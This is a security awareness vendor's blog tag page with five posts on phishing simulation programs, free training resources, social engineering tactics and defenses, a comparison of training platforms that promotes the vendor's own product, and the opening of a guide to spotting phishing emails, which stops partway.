
security awareness

5 posts with the tag “security awareness”

12 Common Cybersecurity Training Exercises (With Proven Results)


Security awareness exercises that actually work share one thing: they create practice, not just knowledge.

The gap between knowing phishing exists and recognizing it in your inbox under deadline pressure is enormous. That gap is where breaches happen. Effective exercises bridge it through realistic practice in safe environments.

Passive training (videos, slideshows, policy documents) creates knowledge without skill. Employees can define phishing but still click malicious links because recognition under pressure requires practiced reflexes, not memorized definitions.

| Training Type          | Knowledge Transfer | Behavior Change | Retention |
|------------------------|--------------------|-----------------|-----------|
| Video + Quiz           | High               | Low             | Weeks     |
| Interactive Simulation | High               | High            | Months    |
| Repeated Practice      | Moderate           | Very High       | Long-term |

The research is clear: people learn by doing. Security awareness exercises that engage employees in realistic decision-making create lasting behavioral change that passive content cannot match.

Phishing simulations are the most impactful single exercise type. Send realistic phishing emails, track who clicks, and provide immediate education.

What makes simulations effective:

  • Realistic scenarios matching actual threats
  • Immediate feedback at the moment of failure
  • Progressive difficulty as employees improve
  • Focus on reporting, not just avoiding clicks

Common mistakes:

  • Templates too obviously fake
  • Punishing failures instead of teaching
  • Running simulations annually instead of continuously
  • Ignoring reporting metrics

Phone-based (vishing) and in-person exercises test whether employees verify identities before sharing information or granting access.

Example scenarios:

  • Caller claims to be IT support and requests password reset
  • Visitor without badge asks to be let into secure area
  • Email appears to be from executive requesting urgent wire transfer

These exercises reveal whether verification procedures are followed under social pressure.

Discussion-based scenarios walk teams through incident response without technical testing. Particularly valuable for:

  • Ransomware response: Decision-making about payment, communication, recovery priorities
  • Data breach disclosure: Regulatory notification, customer communication, legal coordination
  • Executive compromise: Responding when leadership accounts are hijacked

Tabletops expose gaps in procedures and communication before real incidents reveal them painfully.

Hands-on practice with security tools:

  • Setting up multi-factor authentication
  • Using password managers correctly
  • Recognizing suspicious URLs before clicking
  • Encrypting sensitive communications

These exercises build practical capabilities, not just awareness.

Before training, measure current vulnerability. Run unannounced phishing simulations across the organization to establish:

  • Current click-through rate
  • Reporting rate (employees who flag suspicious emails)
  • Time between receiving and reporting
  • Department-level variation

This baseline enables demonstrating improvement and identifying highest-risk groups.

Different roles face different threats. Generic training wastes time on irrelevant scenarios.

Finance teams need:

  • Business email compromise recognition
  • Wire transfer verification procedures
  • Invoice fraud identification

Executives need:

  • Whaling attack recognition
  • Authority exploitation awareness
  • Incident communication protocols

IT staff need:

  • Social engineering defense
  • Secure system administration practices
  • Incident response procedures

Security awareness isn’t an event. It’s a process.

| Exercise Type                  | Recommended Frequency |
|--------------------------------|-----------------------|
| Phishing simulations           | Monthly               |
| Security tips/reminders        | Weekly                |
| Tabletop exercises             | Quarterly             |
| Comprehensive training refresh | Annually              |

Continuous reinforcement maintains awareness without creating fatigue.

Employees who fear punishment for failing exercises will:

  • Hide mistakes instead of reporting them
  • Resent security training
  • Game the system rather than learn

Create environments where:

  • Failures lead to education, not punishment
  • Reporting suspicious activity is celebrated
  • Questions are welcomed, not judged
  • Learning is the explicit goal

| Metric              | Starting Point | Good     | Excellent |
|---------------------|----------------|----------|-----------|
| Phishing click rate | 25-35%         | <10%     | <5%       |
| Report rate         | 5-10%          | >50%     | >70%      |
| Time to report      | Days           | <4 hours | <30 min   |

  • Security incident volume trends
  • Employee sentiment toward security
  • Compliance audit findings
  • Near-miss reports from employees

Single measurements are less valuable than trends. A 15% click rate improving to 8% over six months demonstrates program effectiveness better than any single data point.
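The baseline metrics described above (click rate, report rate, time between receiving and reporting, department-level variation, and the trend across campaigns) computed from a simulation event log, graded against the starting point / good / excellent bands in the table. This is an added example, not code from the original post; the event log is constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed events: (campaign month, employee, department, sent, clicked, reported).
# Timestamps are ISO strings; None means that action never happened.
EVENTS = [
    ("2024-01", "u1", "finance", "2024-01-08T09:00", "2024-01-08T09:05", None),
    ("2024-01", "u2", "finance", "2024-01-08T09:00", None, "2024-01-10T14:00"),
    ("2024-01", "u3", "finance", "2024-01-08T09:00", "2024-01-08T09:20", None),
    ("2024-01", "u4", "engineering", "2024-01-08T09:00", None, "2024-01-08T09:12"),
    ("2024-01", "u5", "engineering", "2024-01-08T09:00", None, None),
    ("2024-01", "u6", "engineering", "2024-01-08T09:00", "2024-01-08T11:00", None),
    ("2024-07", "u1", "finance", "2024-07-08T09:00", None, "2024-07-08T09:30"),
    ("2024-07", "u2", "finance", "2024-07-08T09:00", None, "2024-07-08T09:10"),
    ("2024-07", "u3", "finance", "2024-07-08T09:00", "2024-07-08T09:40", None),
    ("2024-07", "u4", "engineering", "2024-07-08T09:00", None, "2024-07-08T09:03"),
    ("2024-07", "u5", "engineering", "2024-07-08T09:00", None, "2024-07-09T08:00"),
    ("2024-07", "u6", "engineering", "2024-07-08T09:00", None, "2024-07-08T09:15"),
]


def _minutes(sent, reported):
    return (datetime.fromisoformat(reported) - datetime.fromisoformat(sent)).total_seconds() / 60


def campaign_metrics(events):
    """Click rate and report rate as fractions, plus median minutes to report."""
    sent = len(events)
    clicks = sum(1 for e in events if e[4])
    reports = sum(1 for e in events if e[5])
    times = [_minutes(e[3], e[5]) for e in events if e[5]]
    return {
        "click_rate": clicks / sent,
        "report_rate": reports / sent,
        "median_minutes_to_report": median(times) if times else None,
    }


def by_department(events):
    """Department-level variation: the same metrics per department."""
    groups = defaultdict(list)
    for e in events:
        groups[e[2]].append(e)
    return {dept: campaign_metrics(evs) for dept, evs in groups.items()}


def trend(events):
    """Metrics per campaign month, so improvement is judged over time, not once."""
    months = defaultdict(list)
    for e in events:
        months[e[0]].append(e)
    return {m: campaign_metrics(evs) for m, evs in sorted(months.items())}


def grade(metrics):
    """Map one campaign's metrics onto the bands: starting point / good / excellent."""
    click, report = metrics["click_rate"], metrics["report_rate"]
    ttr = metrics["median_minutes_to_report"]
    return {
        "click_rate": "excellent" if click < 0.05 else "good" if click < 0.10 else "starting point",
        "report_rate": "excellent" if report > 0.70 else "good" if report > 0.50 else "starting point",
        "time_to_report": ("excellent" if ttr is not None and ttr < 30 else
                           "good" if ttr is not None and ttr < 240 else "starting point"),
    }


if __name__ == "__main__":
    for month, metrics in trend(EVENTS).items():
        print(month, metrics, grade(metrics))
    print(by_department([e for e in EVENTS if e[0] == "2024-01"]))
```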

Exercises designed to catch people create resentment. Employees who feel tricked become resistant to the entire program and less likely to report future mistakes.

Instead: Frame exercises as practice opportunities. Celebrate improvement. Treat failures as learning moments.

Training about “hackers” and “cybercriminals” feels abstract. Scenarios involving your actual systems, vendors, and processes feel relevant.

Instead: Customize scenarios to reflect real threats facing your organization and industry.

Awareness decays rapidly. Annual training creates a brief spike of vigilance followed by 11 months of decline.

Instead: Maintain continuous, varied touchpoints throughout the year.

Pitfall 4: Ignoring Executive Participation


When executives exempt themselves from training, they signal that security isn’t actually important, and they remain the highest-value targets.

Instead: Ensure visible executive participation and support.

Pitfall 5: Measuring Completion, Not Impact


100% training completion means nothing if click rates don’t improve and reporting doesn’t increase.

Instead: Measure behavioral outcomes, not administrative checkboxes.

Case Study: Manufacturing Company Transformation


A 500-employee manufacturing company implemented a comprehensive exercise program after experiencing two successful phishing attacks in six months.

Baseline state:

  • 32% phishing simulation click rate
  • 4% suspicious email reporting rate
  • Annual compliance video training

Program implemented:

  • Monthly phishing simulations with immediate feedback
  • Quarterly department-specific scenarios
  • Security champion program with peer education
  • Recognition for threat reporters

Results after 12 months:

  • 6% phishing simulation click rate (81% improvement)
  • 68% suspicious email reporting rate (17x increase)
  • Zero successful phishing attacks
  • Employee security satisfaction: 4.2/5 (up from 2.1/5)

The transformation came from practice, not policy. Employees who regularly encountered simulated threats developed reflexes that protected them against real ones.

  • Run baseline phishing simulation
  • Survey employees about security awareness
  • Identify high-risk roles and departments
  • Select exercise platforms and content
  • Develop role-specific training paths
  • Create communication plan
  • Establish metrics and goals
  • Roll out initial exercises to pilot group
  • Gather feedback and adjust
  • Expand organization-wide
  • Monitor metrics monthly
  • Update scenarios based on current threats
  • Recognize and reward security-conscious behavior
  • Continuously improve based on data

Security awareness exercises work because they create practice, not just knowledge. The organizations that dramatically reduce their phishing click rates and increase their incident reporting aren’t running better lectures. They’re running better exercises.

Start with baseline measurement. Design role-appropriate scenarios. Create psychological safety for learning. Measure outcomes, not completion. Iterate continuously.

Your employees encounter potential threats daily. Give them the practice they need to respond appropriately.


Experience the difference between passive content and interactive practice. Try our free security awareness exercises and see how simulation-based training builds real defensive skills.

Free Security Awareness Training: Quality Resources That Won't Cost You


Budget constraints are real. Whether you’re a startup founder, a small business owner, or an IT manager at a company that hasn’t yet prioritized security training investment, you need options that don’t require five-figure commitments.

Good news: legitimate free security awareness training exists. It won’t match enterprise platforms with dedicated customer success teams and unlimited customization, but it can meaningfully improve your organization’s security posture.

This guide separates genuinely useful free resources from marketing traps, explains what free options can and can’t do, and helps you make an informed decision about when free is enough and when it isn’t.

What “Free” Actually Means in Security Training


Before diving into specific resources, understand the business models behind free offerings:

Freemium models: Limited free tiers designed to demonstrate value and convert users to paid plans. These often restrict user counts, features, or content access.

Government and nonprofit resources: Genuinely free educational content funded by taxpayers or organizational missions. Quality varies, but there’s no sales funnel.

Marketing-driven content: Free resources designed primarily to capture leads. The training may be superficial, with real value locked behind paywalls.

Open-source projects: Community-developed resources available without cost. Often require technical expertise to deploy.

Each model has implications for what you’ll actually receive and what strings may be attached.

Let’s address the elephant in the room: we offer a free interactive exercise library and you’re reading our blog.

Here’s the honest breakdown:

What’s included free:

  • Interactive 3D phishing simulations
  • Social engineering awareness scenarios
  • Basic security fundamentals exercises
  • No registration required to try

What’s not included:

  • Full course library (premium only)
  • SCORM packages for LMS integration
  • Analytics and completion tracking
  • Custom branding and configuration
  • Dedicated support

Why we do this: We believe people should experience quality security training before buying. Our free exercises demonstrate what’s possible with interactive simulations versus passive video content. Some organizations will never need more than free resources. Others will see the value and choose to invest in comprehensive solutions.

No guilt trips. No aggressive sales follow-up. Just quality free resources.

Several government agencies and nonprofits provide legitimate free security awareness resources:

CISA (Cybersecurity and Infrastructure Security Agency)


The U.S. government’s cybersecurity agency offers:

  • Free training courses covering security fundamentals
  • Phishing awareness materials for organizational use
  • Industry-specific guidance for critical infrastructure sectors
  • Tabletop exercise packages for incident response practice

Best for: Organizations seeking credible, vendor-neutral content backed by government expertise.

Limitations: Content can be dry and government-focused. No interactive simulations or engagement features.

SANS, known for technical security training, offers:

  • Free security awareness resources for community use
  • Poster and newsletter templates
  • Basic training modules on common threats

Best for: Organizations with technical audiences who respect the SANS brand.

Limitations: Free tier is limited; premium content requires significant investment.

StaySafeOnline.org provides:

  • Consumer-focused security guidance
  • Small business security resources
  • Annual awareness campaign materials (Cybersecurity Awareness Month)

Best for: Small organizations seeking basic, accessible content.

Limitations: Consumer-oriented; may not address enterprise concerns adequately.

| Capability               | Free Resources         | Paid Platforms     |
|--------------------------|------------------------|--------------------|
| Basic security content   | Usually adequate       | Comprehensive      |
| Interactive simulations  | Limited/none           | Extensive          |
| Phishing simulation tools| Rarely included        | Core feature       |
| LMS integration (SCORM)  | Rarely                 | Standard           |
| Progress tracking        | Basic/none             | Detailed analytics |
| Role-based training paths| No                     | Yes                |
| Customization            | Minimal                | Extensive          |
| Regular content updates  | Inconsistent           | Continuous         |
| Support                  | Community/self-service | Dedicated          |

Free security awareness training may be sufficient if:

Your organization is small (under 25 employees)

  • Administrative overhead of enterprise platforms isn’t justified
  • You can personally follow up on training completion
  • Individual attention compensates for platform limitations

You’re establishing baseline awareness

  • Employees have never received security training
  • Any training is better than current state (none)
  • You’re building the case for future investment

You have technical capability

  • IT staff can deploy open-source solutions
  • You can build custom training using free content
  • Integration with existing systems isn’t a requirement

Compliance isn’t driving requirements

  • You’re not subject to regulations mandating specific training
  • Audit documentation isn’t a primary concern
  • “We did training” is sufficient for stakeholders

Consider paid solutions when:

Scale matters

  • Training hundreds or thousands of employees
  • Multiple locations or distributed workforce
  • Administrative burden of manual tracking becomes prohibitive

Compliance requires documentation

  • Regulations mandate training records
  • Auditors expect completion reports
  • Liability concerns require provable training delivery

Phishing simulation is essential

  • You need to measure actual employee vulnerability
  • Continuous testing is required for improvement
  • Simulated attacks must appear legitimate

Behavior change is the goal

  • Passive awareness isn’t translating to action
  • You need engagement-driving features (gamification, competitions)
  • Interactive scenarios are required for skill development

Integration is required

  • Training must integrate with existing LMS
  • Single sign-on is necessary for adoption
  • Reporting must feed into security dashboards

If you’ve decided free resources fit your current needs, maximize their impact:

Don’t just share random links. Build a coherent curriculum:

  1. Foundation: Basic security principles everyone needs
  2. Threat-specific: Phishing, social engineering, password security
  3. Role-specific: Additional content for high-risk positions
  4. Ongoing: Regular reinforcement and updates

Generic free content becomes more relevant with organizational context:

  • Add examples using your company’s actual systems and processes
  • Include your specific policies and procedures
  • Reference recent industry incidents affecting similar organizations
  • Feature real (anonymized) near-misses from your organization

Even without platform analytics, measure something:

  • Training completion (even if manually tracked)
  • Quiz scores if resources include assessments
  • Incident rates before and after training
  • Employee feedback and comprehension

Annual training isn’t enough. Create ongoing touchpoints:

  • Monthly security tips via email or Slack
  • Quarterly focused training on specific threats
  • Real-time alerts when relevant threats emerge
  • Regular reminders of reporting procedures

Phishing simulation is the most impactful training component, but also the hardest to get free. Options include:

A legitimate open-source phishing simulation platform:

Pros:

  • Fully featured simulation capability
  • No per-user licensing costs
  • Complete control over data

Cons:

  • Requires technical expertise to deploy
  • No support beyond community forums
  • You’re responsible for email deliverability
  • No pre-built training content

Best for: Organizations with technical staff willing to invest setup time.

Several vendors offer restricted free access:

  • Limited user counts (often 25-50 users)
  • Limited simulation frequency
  • Basic reporting only
  • Sales follow-up expected

Best for: Evaluating platforms before purchase or very small organizations.

If free resources are a stepping stone to proper investment, gather evidence:

  • Document phishing emails that reached employees
  • Note security incidents involving human error
  • Research breach costs in your industry
  • Calculate potential liability exposure
  • Show tracking gaps that prevent compliance documentation
  • Identify engagement issues with passive content
  • Document administrative time spent on manual processes
  • Note security gaps free resources don’t address

Compare training costs against:

  • Average breach cost in your industry ($4.88 million globally)
  • Incident response and recovery costs
  • Regulatory fine exposure
  • Reputation damage potential

Even modest training investments show favorable ROI against these risks.

When you’re ready to upgrade:

  • Note which free content resonated with employees
  • Keep reinforcement cadences that proved effective
  • Maintain cultural elements that drove engagement
  • Prioritize features that free resources lacked
  • Focus on measurable improvements to existing weaknesses
  • Ensure new platform solves actual problems, not theoretical ones
  • Communicate change to employees
  • Allow learning curve with new platform
  • Compare metrics before and after transition

Free security awareness training is a legitimate starting point. Government resources, nonprofit content, and vendor free tiers can meaningfully improve security posture when budgets are constrained.

But free has limits. It lacks the engagement features, simulation capabilities, analytics, and support that drive sustained behavior change at scale. Organizations serious about security eventually outgrow free resources.

The question isn’t “free or paid?” It’s “free for now, or paid now?”

Start with quality free resources. Measure what you can. Build the case for investment. When you’re ready, transition to solutions that match your organizational maturity.

Your security posture shouldn’t be limited by what’s free. But it also shouldn’t be zero because enterprise solutions seem out of reach.


Experience the difference between passive and interactive security training. Try our free exercise library. No registration, no credit card, no sales pitch. Just quality training you can start today.

Social Engineering Attacks: How Hackers Exploit Human Psychology


A hacker doesn’t need to crack your encryption. They just need to convince one employee to help them.

Social engineering attacks exploit human psychology instead of technical vulnerabilities. While your security team patches software and monitors networks, attackers study your organization chart, LinkedIn profiles, and even your company’s Glassdoor reviews, looking for ways to manipulate the humans behind your defenses.

These attacks work because they target something no firewall can protect: the natural human tendencies to trust, help, and comply with authority.

Traditional hacking targets systems. Social engineering targets people.

| Technical Attack                | Social Engineering Attack |
|---------------------------------|---------------------------|
| Exploits software vulnerability | Exploits human trust      |
| Blocked by security tools       | Bypasses security tools   |
| Requires technical skill        | Requires psychological skill |
| Can be patched                  | Can’t be “patched”        |
| Detected by automated systems   | Often undetected          |

The most sophisticated security infrastructure becomes worthless when an employee willingly provides credentials, disables controls, or transfers funds because a convincing attacker asked them to.

Social engineers don’t use mind control. They leverage well-documented cognitive biases that affect everyone:

People comply with perceived authority figures. An email appearing to come from the CEO requesting an urgent wire transfer works because employees are conditioned to follow executive directives without questioning.

Time pressure short-circuits rational analysis. “Your account will be locked in 30 minutes” or “This deal closes today” creates panic that overrides caution.

When someone does something for us, we feel obligated to return the favor. An attacker who “helps” with a fake IT issue may ask for credentials in return.

We assume actions are correct if others are doing them. “Everyone in your department has already updated their credentials” makes compliance feel normal.

We’re more likely to comply with requests from people we like. Attackers build rapport, find common interests, and mirror communication styles to create artificial trust.

The most common attack vector. Fraudulent emails impersonate trusted entities (banks, vendors, colleagues) to steal credentials or deploy malware.

How it works:

  1. Attacker researches target organization
  2. Creates convincing email mimicking trusted sender
  3. Includes malicious link or attachment
  4. Victim clicks, providing credentials or installing malware

Real example: In 2020, Twitter employees received calls from attackers posing as internal IT support. The callers directed employees to a phishing site that captured their credentials, leading to the compromise of high-profile accounts including Barack Obama and Elon Musk.

Targeted phishing focused on specific individuals, using personal information to increase credibility.

Key differences from generic phishing:

  • References specific projects, colleagues, or recent activities
  • Appears to come from known contacts
  • Contains accurate organizational details
  • Tailored to victim’s role and responsibilities

Spear phishing targeting executives (“whales”) with access to significant funds or sensitive decisions.

Real example: In 2016, FACC, an Austrian aerospace company, lost €50 million when attackers convinced finance staff that the CEO had authorized emergency wire transfers for a confidential acquisition. Both the CEO and CFO were fired.

Phone-based attacks where callers impersonate IT support, executives, government officials, or other trusted entities.

Common pretexts:

  • “IT helpdesk calling about a security issue”
  • “This is HR verifying your benefits information”
  • “Your bank’s fraud department has detected suspicious activity”

Text message attacks leveraging the immediacy and perceived legitimacy of SMS.

Why it’s effective:

  • People trust text messages more than email
  • Mobile screens hide suspicious URL details
  • SMS feels more personal and urgent
  • Links can appear as shortened URLs

Creating a fabricated scenario to establish trust before making the actual request.

Example scenario: An attacker calls reception claiming to be from the IT department. They explain they’re troubleshooting an issue affecting several departments and need to verify some information. After building rapport over several calls about “resolving” the fake issue, they request credentials to “complete the fix.”

Using physical or digital “bait” to deliver malware or capture credentials.

Physical baiting: Leaving infected USB drives in parking lots, lobbies, or conference rooms labeled “Payroll” or “Confidential”

Digital baiting: Offering free software, games, or media that contains malware

Gaining physical access by following authorized personnel through secured doors.

How it works: An attacker carrying boxes approaches a badge-protected door just as an employee exits. Social convention makes it awkward to demand credentials from someone who appears to belong, so the employee holds the door.

Attackers sent phishing emails to small groups of RSA employees with the subject “2011 Recruitment Plan” containing a malicious Excel file. One employee retrieved the email from their junk folder and opened it.

Result: Attackers gained access to RSA’s SecurID authentication system, ultimately affecting defense contractors and government agencies using RSA tokens.

Lesson: Technical controls (spam filtering) worked, but human curiosity defeated them.

Attackers used spear phishing emails targeting Sony executives with messages appearing to come from Apple about ID verification.

Result: Massive data breach exposing unreleased films, employee data, executive emails, and confidential business information. Estimated cost: $100+ million.

Lesson: Even tech-savvy organizations are vulnerable to well-crafted social engineering.

Attackers impersonated executives in emails requesting wire transfers to overseas accounts for a supposed acquisition.

Result: $46.7 million stolen. Some funds recovered, but significant losses remained.

Lesson: Email-based wire transfer requests require out-of-band verification regardless of apparent sender.

Warning Signs of Social Engineering Attempts


Train employees to recognize these red flags:

  • Sender address doesn’t match claimed identity
  • Unusual urgency or time pressure
  • Requests for sensitive information or unusual actions
  • Grammar and formatting inconsistent with sender’s normal style
  • Links that don’t match expected destinations (hover to check)
  • Unsolicited contact requesting sensitive information
  • Pressure to act immediately
  • Resistance to callback verification
  • Requests to bypass normal procedures
  • Information requests that seem excessive for stated purpose
  • Unfamiliar person requesting access or information
  • Claimed authority that can’t be verified
  • Emotional manipulation (urgency, flattery, intimidation)
  • Requests to circumvent security procedures

Technology can’t stop social engineering, but it can reduce attack surface:

Email security:

  • Advanced threat detection for phishing
  • DMARC, DKIM, SPF for sender verification
  • Warning banners for external emails
  • Link rewriting and sandboxing

Access controls:

  • Multi-factor authentication everywhere
  • Principle of least privilege
  • Separate credentials for sensitive systems
  • Physical access controls and visitor management

Policies that create friction for attackers:

Verification requirements:

  • Out-of-band confirmation for wire transfers
  • Callback procedures for sensitive requests
  • Identity verification for help desk calls
  • Visitor check-in and escort policies

Escalation paths:

  • Clear procedures for reporting suspicious contacts
  • No-retaliation policy for false positives
  • Security team contact information readily available

The most critical defense layer:

Effective training includes:

  • Recognition of attack techniques
  • Psychological awareness (understanding why we’re vulnerable)
  • Practical exercises (simulated phishing)
  • Clear reporting procedures
  • Regular reinforcement (not annual checkbox training)

Measure effectiveness through:

  • Phishing simulation click rates
  • Suspicious activity reporting rates
  • Time to report potential incidents
  • Post-incident analysis of successful attacks

Policies and training matter, but culture determines outcomes.

Executives must visibly follow security procedures. When the CEO ignores policies, employees conclude security isn’t actually important.

Celebrate employees who report suspicious activity, even false positives. The employee who reports 10 suspicious emails (including 9 that were legitimate) is protecting the organization. The employee who never reports anything is probably missing real threats.

Employees who fall for attacks should receive support and additional training, not punishment. Fear of blame drives concealment, which extends attacker access and increases damage.

Security awareness isn’t a training event. It’s an ongoing conversation. Regular updates about current threats, recent incidents (anonymized), and emerging techniques keep security top-of-mind.

When attacks succeed (and eventually they will):

  1. Contain: Isolate affected systems and accounts
  2. Preserve: Don’t delete evidence (logs, emails, files)
  3. Report: Notify security team immediately
  4. Document: Record timeline and actions taken
  • Determine attack scope and affected systems
  • Identify how attacker gained initial access
  • Assess what information was accessed or stolen
  • Document for potential legal proceedings
  • Reset affected credentials
  • Remediate compromised systems
  • Address procedural gaps that enabled attack
  • Update training based on lessons learned
  • Consider notification obligations (legal, regulatory)

Social engineering attacks succeed because they target human nature, not technology. The same traits that make us good colleagues, like trust, helpfulness, and respect for authority, become vulnerabilities when exploited by skilled attackers.

Defense requires layered approaches: technical controls to reduce attack surface, procedures to verify sensitive requests, training to build recognition skills, and culture to encourage vigilance without creating paranoia.

Your employees will always be your greatest vulnerability. With proper training and culture, they can also become your strongest defense.


Want to experience social engineering attack simulations firsthand? Try our free interactive security exercises and practice identifying threats in realistic scenarios.

KnowBe4 Alternatives: Security Awareness Platforms Compared (2026)


KnowBe4 dominates the security awareness training market. But market dominance doesn’t mean every organization is best served by the leader.

Whether you’re evaluating options for the first time, outgrowing your current solution, or finding KnowBe4’s approach doesn’t fit your needs, alternatives exist across every price point and feature set.

This comparison examines what different platforms offer, where they excel, and which organizational contexts they serve best.

Why Organizations Seek KnowBe4 Alternatives


Before comparing platforms, understand why buyers look beyond the obvious choice:

Pricing concerns: KnowBe4’s per-user licensing creates significant costs at scale. Organizations with thousands of users or tight budgets explore alternatives with different pricing models.

Content approach: KnowBe4’s content library is extensive but some organizations find the style doesn’t resonate with their workforce. Training effectiveness depends on engagement, and engagement depends on content fit.

Feature requirements: Some organizations need capabilities KnowBe4 doesn’t prioritize: advanced simulations, specific compliance frameworks, or particular LMS integrations.

Vendor diversity: Mature security programs avoid single-vendor dependency. Evaluating alternatives ensures competitive pricing and informed decisions.

User experience: Platform interfaces vary significantly. Organizations switching from one platform often cite usability as a primary driver.

RansomLeak: Interactive Simulation-First Training


Full disclosure: this is our platform. We’ll describe what we offer honestly, including what we do well and where we’re building.

Interactive 3D simulations: Rather than video content followed by quizzes, RansomLeak exercises place employees in realistic scenarios where they must identify threats, make decisions, and experience consequences in simulated environments.

Engagement-first design: Exercises use gamification, branching narratives, and immediate feedback to maintain attention and drive completion. Our completion rates consistently exceed industry benchmarks.

SCORM compatibility: Export any content as SCORM packages for integration with existing LMS platforms. One-click export, tested compatibility across major systems.

Flexible deployment: Use our cloud platform for full analytics and campaign management, or deploy SCORM packages through your existing infrastructure.

  • Organizations prioritizing engagement and behavior change over checkbox compliance
  • Companies with existing LMS investments wanting SCORM-compatible content
  • Teams that have tried video-based training and found it ineffective
  • Organizations seeking interactive simulations without enterprise complexity

  • Smaller content library than established market leaders (we’re growing)
  • Newer platform means less market validation (we’re proving ourselves)
  • Advanced enterprise features still in development

Competitive per-user pricing with volume discounts. Free trial available with no credit card required.

Explore RansomLeak exercises →

Proofpoint acquired Wombat Security and integrates awareness training with their email security platform.

Email security integration: Organizations using Proofpoint for email protection benefit from unified reporting and threat intelligence that informs training content.

Established content library: Years of development produced comprehensive training modules covering most security topics.

Enterprise scale: Proven deployment across large organizations with complex requirements.

Pricing: Enterprise-focused pricing may not suit smaller organizations.

Platform bundling: Highest value comes with full Proofpoint suite adoption, which may not align with your security architecture.

Content style: Traditional video-heavy approach may not maximize engagement for all audiences.

  • Organizations already invested in Proofpoint email security
  • Enterprise buyers seeking integrated security platforms
  • Compliance-focused programs prioritizing completeness over engagement

Cofense focuses specifically on phishing simulation and response.

Phishing specialization: Deep focus on phishing simulation creates sophisticated testing capabilities.

Managed services: Options for fully-managed phishing programs reduce internal resource requirements.

Incident response integration: PhishMe’s origins created strong workflows for reporting and responding to real attacks.

Narrow focus: Less comprehensive general security awareness content compared to broader platforms.

Complexity: Advanced features create learning curves for program administrators.

Pricing model: Can become expensive for comprehensive programs.

  • Organizations prioritizing phishing simulation over general awareness
  • Security teams wanting managed simulation services
  • Mature programs needing advanced simulation capabilities

Mimecast acquired Ataata to add awareness training to their email security platform.

Email security integration: Similar to Proofpoint, organizations using Mimecast for email benefit from integrated reporting.

Risk-based targeting: Training recommendations based on email security data and threat exposure.

Short-form content: Micro-learning approach suits organizations seeking minimal time commitment.

Platform dependency: Value proposition strongest within Mimecast ecosystem.

Acquisition integration: Ataata integration still maturing in some areas.

Limited customization: Less flexibility than some alternatives for custom content needs.

  • Existing Mimecast email security customers
  • Organizations preferring micro-learning formats
  • Buyers seeking integrated email security and training

SANS brings their technical training reputation to security awareness.

Technical credibility: SANS brand recognition matters for technical audiences who value authoritative content.

Comprehensive content: Deep library covering topics beyond basic awareness.

Role-based training: Strong differentiation for technical vs. non-technical audiences.

Premium pricing: SANS quality commands premium pricing that may exceed budgets.

Technical orientation: Content may be more technical than general workforce needs.

Less modern UX: Platform interface reflects enterprise software more than modern SaaS.

  • Organizations with technical workforces valuing SANS credibility
  • Buyers prioritizing content depth over engagement features
  • Companies with training budgets supporting premium solutions

Terranova focuses on human risk management with awareness training as a component.

Behavior-focused approach: Emphasis on behavior change beyond simple awareness metrics.

Multilingual content: Strong internationalization for global organizations.

Compliance alignment: Content mapped to specific regulatory requirements.

Complex positioning: Platform capabilities can be difficult to evaluate quickly.

Market presence: Lower visibility than market leaders may concern some buyers.

  • Global organizations needing multilingual content
  • Compliance-driven programs requiring specific regulatory mapping
  • Buyers interested in behavior-focused approaches

Platform   | Best For                 | Content Style    | Phishing Sim | SCORM Export | Pricing
RansomLeak | Engagement-focused orgs  | Interactive 3D   | Yes          | Yes          | Competitive
KnowBe4    | Large enterprises        | Video + Quiz     | Yes          | Limited      | Per-user
Proofpoint | Email security customers | Video            | Yes          | Yes          | Enterprise
Cofense    | Phishing-focused         | Varies           | Advanced     | Limited      | Enterprise
Mimecast   | Mimecast customers       | Micro-learning   | Yes          | Limited      | Bundled
SANS       | Technical orgs           | In-depth         | Yes          | Yes          | Premium
Terranova  | Global compliance        | Behavior-focused | Yes          | Yes          | Mid-range

Before comparing platforms, clarify what matters most:

Must-haves:

  • What features are non-negotiable?
  • What integrations are required?
  • What compliance requirements must be met?
  • What budget constraints exist?

Nice-to-haves:

  • What features would improve the program?
  • What future needs should you plan for?
  • What would make administration easier?

Platform demos should address:

  • Admin experience for program management
  • User experience for employees
  • Reporting and analytics capabilities
  • Integration processes
  • Content library breadth and quality

Before committing, test with real users:

  • Deploy to a small group
  • Measure completion rates and engagement
  • Gather user feedback
  • Evaluate admin effort required
  • Confirm integration functionality

Consider costs beyond licensing:

  • Implementation and configuration effort
  • Ongoing administration time
  • Content customization needs
  • Training for program administrators
  • Integration maintenance

About content:

  • How frequently is content updated?
  • Can we preview the full library before purchase?
  • How do you handle content that doesn’t resonate with our users?
  • What customization options exist?

About phishing simulation:

  • How realistic are simulation templates?
  • Can we create custom simulations?
  • How do you handle false positives (mail security catching simulations)?
  • What reporting is available at individual, department, and organizational levels?

About integration:

  • Which LMS platforms have you tested with?
  • What’s the SCORM export process?
  • How do you integrate with our email system?
  • What SSO options are supported?

About support:

  • What’s included in base pricing vs. additional cost?
  • What’s typical response time for issues?
  • Is there a customer success resource assigned to our account?
  • How do you help us succeed, not just use the platform?

KnowBe4 remains the right choice if:

  • You’re satisfied with current results
  • Budget isn’t a primary constraint
  • Content style resonates with your workforce
  • You value market leadership and ecosystem size

Consider alternatives when:

  • Engagement and completion rates are disappointing
  • Pricing creates budget pressure at scale
  • Specific features are missing that you need
  • Your organization outgrew the initial solution

We’re the right fit if:

  • Interactive simulations matter more than content volume
  • SCORM compatibility is required
  • Engagement drives your training effectiveness
  • You want to experience quality training before committing

KnowBe4’s market position doesn’t make it universally optimal. The right security awareness platform depends on your organizational context, priorities, and constraints.

Define requirements clearly. Evaluate multiple options. Test before committing. The platform that creates behavior change for your workforce, regardless of market share, is the one worth choosing.


Experience interactive security training that prioritizes engagement. Try our free exercises. No sales pitch, just quality training you can evaluate on your own terms.

How to Spot Phishing: The Visual and Technical Signs That Reveal Fraud

You know what phishing looks like. Misspelled words, suspicious links, Nigerian princes. You’ve done the training. You’ve passed the tests.

And yet.

Somewhere, right now, someone who knows all of this is clicking a link they shouldn’t. Not because they’re careless or stupid, but because they’re busy, distracted, and the email looked just legitimate enough.

Phishing detection isn’t about knowledge. It’s about habits that kick in automatically, even when you’re not thinking clearly.

Most phishing fails a quick sanity check. The problem is we don’t do the check. We see an email, we react, we click. The trick is building a pause into that reaction:

  1. Was this expected? Unexpected requests for credentials, payments, or sensitive data are suspicious by default.

  2. Does the context make sense? An “account locked” email for a service you don’t use is obviously fake. But even for services you do use, did you do anything that would trigger this?

  3. Who sent this? Look at the actual email address, not just the display name. “PayPal Security” from security-paypal@mail-verify.net is not PayPal.

